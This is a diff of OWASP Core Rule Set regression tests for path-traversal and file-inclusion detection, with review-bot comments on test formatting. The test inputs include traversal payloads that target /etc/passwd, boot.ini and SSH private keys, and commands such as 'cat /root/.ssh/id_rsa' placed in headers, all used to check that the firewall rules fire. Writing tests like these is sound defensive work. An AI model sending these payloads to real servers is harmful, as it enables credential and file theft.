+ --boundary-- + output: + log_contains: id "922120" + - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as there is no content-transfer-encoding header. - --boundary-- - output: - no_log_contains: id "922120" + This should be good as there is no content-transfer-encoding header. + --boundary-- + output: + no_log_contains: id "922120" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml index 276aa07f9..8a35994d4 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml 
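Review bot: The `desc` of test_id 1, `Positive test: utf-7 is not in allowed charsets`, reads as copied from 922110 and does not describe this test: the part that distinguishes it carries `Content-Transfer-Encoding: 8bit`, and test_id 2 explicitly names the absence of that header as the good case. Suggest `desc: "Positive test: Content-Transfer-Encoding header in a multipart part is not allowed"`, adjusted to whatever the rule actually checks — presumably Content-Transfer-Encoding, judging from test_id 2. The document's `---` line lies outside the hunk, which starts at line 2.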
@@ -1,73 +1,68 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930100.yaml" description: "Application attack LFI" +rule_id: 930100 tests: - - test_title: 930100-1 + - test_id: 1 desc: "Path Traversal Attack (/../) encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e.%00/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e.%00/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=.../.../WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=.../.../WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 4 desc: "Status Page Test - Path Traversal Attack (../), partially encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e./" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e./" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930100" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index 2a0e587e7..75eccd74a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml 
@@ -1,219 +1,206 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930110.yaml" description: "Application attacks: Local file include" +rule_id: 930110 tests: - - test_title: 930110-1 + - test_id: 1 desc: "Path Traversal Attack (/../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?arg=../../../etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-3 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?arg=../../../etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages: - - stage: 
- input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "arg=../../../etc/passwd&foo=var" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-4 + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "arg=../../../etc/passwd&foo=var" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo../1234" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo.../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-6 + - input: + dest_addr: "localhost" + method: "GET" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo.../1234" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/..foo" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-7 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/..foo" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 7 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/.." - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-8 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/.." 
+ version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?arg=..\pineapple' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-9 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?arg=..\pineapple' + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?foo=.../.../WINDOWS/win.ini' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-10 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?foo=.../.../WINDOWS/win.ini' + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="../1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="../1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-11 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="..\1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + 
------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="..\1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-12 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/get?a=..;.\\.;\\." - version: "HTTP/1.1" - output: - log_contains: id "930110" + version: "HTTP/1.1" + output: + log_contains: id "930110" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3e99e2d10..e9ead764a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml 
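Review bot: In test_id 12 the line `uri: "/get?a=..;.\\.;\\."` is the only line of the stage's `input` mapping kept as context while every neighbouring line is re-indented, which suggests its old indentation already sat at the new level, i.e. outside the old `input:` block; the re-indent now places it inside `input`, so this test may start sending a URI it previously did not, and it is worth confirming that it passes with `log_contains: id "930110"` and that this is intended. Separately, test_id 2 through 7 all share `desc: "Path Traversal Attack (/../) query string"` even though 4 to 7 are negative cases (`no_log_contains`) with payloads such as `/get/foo../1234` and `/get/..foo`; a distinct description per case, e.g. `desc: "Negative test: .. inside a path segment (/get/foo../1234)"`, would make a failure readable. The `Accept` header is quoted only in test_id 10 and 11; pick one style for the file.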
@@ -2,185 +2,173 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 930120.yaml tests: - - test_title: 930120-1 + - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=/etc/passwd%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=/etc/passwd%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 4 desc: "OS File Access" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
- uri: "/get?foo=arg&path_comp=.ssh/id_rsa" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=arg&path_comp=.ssh/id_rsa" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 5 desc: "LFI via parameter name: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?/sys/class=test" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?/sys/class=test" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 6 desc: "LFI via parameter value: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?test=/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?test=/sys/class" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 
7 desc: "LFI via parameter value: /etc/subuid" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=cat+%2Fetc%2Fsubuid-" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=cat+%2Fetc%2Fsubuid-" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 9 desc: | YM9WT5NU Disallow writing files to /tmp/ stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp/curl" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-10 + - 
input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp/curl" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 10 desc: | YM9WT5NU False positive test stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?code=>/tmp" - version: "HTTP/1.1" - output: - no_log_contains: id "930120" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?code=>/tmp" + version: "HTTP/1.1" + output: + no_log_contains: id "930120" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index ca1a8aa9e..6bee94f87 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml 
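Review bot: Unlike the other files in this series (922110, 922120, 930100 and 930110 each gain a `+rule_id: NNNNNN` line), this hunk removes `enabled` and `name` from `meta` without adding `rule_id: 930120`; the counts (-185/+173, matching the two meta lines plus ten `- stage:` lines removed and nothing added) confirm the omission. The following 930121 hunk (-216/+204, with no `+rule_id` line in its visible part) has the same gap. If the new test format identifies tests by `rule_id` rather than by file name, these two files lose their rule identification; add `rule_id: 930120` after the `description: None` line, and `rule_id: 930121` in the sibling. While there, note that `description: None` is the string `None` in YAML, not a null, so either write a real description or drop the key. The document's `---` line lies outside the hunk, which starts at line 2.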
@@ -1,216 +1,204 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 930121.yaml tests: - - test_title: 930121-1 + - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930121" + - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "cat /etc/apache2/apache2/apache2.conf" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: 
